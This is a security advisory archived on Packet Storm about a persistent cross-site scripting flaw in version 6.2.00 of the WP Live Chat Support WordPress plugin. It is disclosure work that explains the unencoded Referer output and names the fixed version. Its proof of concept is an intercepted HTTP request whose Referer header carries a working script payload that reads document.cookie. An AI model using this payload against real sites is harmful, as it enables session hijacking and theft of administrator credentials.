Twenty Year Anniversary

WordPress Live Chat Support 6.2.00 Cross Site Scripting

WordPress Live Chat Support 6.2.00 Cross Site Scripting
Posted Jul 11, 2016
Authored by Han Sahin

WordPress Live Chat Support plugin version 6.2.00 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
MD5 | 9145a57994ede874ba32eef668b65779

WordPress Live Chat Support 6.2.00 Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
Persistent Cross-Site Scripting in WP Live Chat Support plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WP Live Chat Support plugin. By using this vulnerability an attacker
can supply malicious code on behalf of a logged on WordPress user in
order to perform a wide variety of actions, such as stealing victims'
session tokens or login credentials, performing arbitrary actions on
their behalf, and logging their keystrokes.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Live Chat Support WordPress
plugin version 6.2.00.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in version 6.2.02 of the WP Live Chat Support
plugin. The updated plugin can be downloaded from the following
location:
https://downloads.wordpress.org/plugin/wp-live-chat-support.zip.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wp_live_chat_support_plugin.html

The WP Live Chat Support plugin uses the Referer header to present the current page on which the chat is initiated to backend (wp-admin) chat users. However, the URL retrieved from the database isn't properly output encoded according to output context (JavaScript and HTML). As a result persistent Cross-Site Scripting is introduced.

$wpdb->insert(
$wplc_tblname_chats,
array(
'status' => '5',
'timestamp' => current_time('mysql'),
'name' => $name,
'email' => $email,
'session' => $session,
'ip' => maybe_serialize($user_data),
'url' => $_SERVER['HTTP_REFERER'],
'last_active_timestamp' => current_time('mysql'),
'other' => maybe_serialize($other),
),
array(
'%s',
'%s',
'%s',
'%s',
'%s',
'%s',
'%s',
'%s',
'%s'
)
);

The PHP code of the vulnerable output (HTML and JS context) is as follows:

echo " <span class='part1'>" . __("Chat initiated on:", "wplivechat") . "</span> <span class='part2'>" . $result->url . "</span>";

The PHP code for the page is as follows:

</span> <a href='"+v_browsing_url+"' target='_BLANK'>"+v_browsing+"</a><br /><span class='wplc-sub-item-header'>Email:</span> <a href='mailto:"+v_email+"' target='_BLANK'>"+v_email+"</a></span>";

The malicious code supplied by an attacker can be used to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Stored Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users. The victim (potentially even WP-admin) only has to view the wplivechat-menu page which generally is the first page when the plugin is opened.

http://<wordpress site>/wp-admin/admin.php?page=wplivechat-menu
Proof of concept

This vulnerability can be demonstrated by intercepting the wplc_start_chat action after filling in your name and e-mail and then changing the Referer header relative path to the Cross-Site Scripting payload.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.28.129
Content-Length: 117
Accept: */*
Origin: http://192.168.28.129
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.28.129/'"><img src=x onerror=alert(document.cookie)>/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
Cookie: wplc_cid=1742; wplc_name=Guest; wplc_email=no%20email%20set; wplc_chat_status=5; iflychat_guest_id=1467535930we14g; iflychat_guest_session=320f0212654acf6216884952f5766c7b; iflychat_guest_name=Guest%20Norene; iflychat_key=undefined; iflychat_css=undefined; iflychat_time=1467535929896; wplc_hide=
Connection: close

action=wplc_start_chat&security=5d2beba087&name=Sahin&email=han.sahin%40securiy.nl&cid=1742&wplcsession=1467535929687

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    16 Files
  • 17
    Aug 17th
    22 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close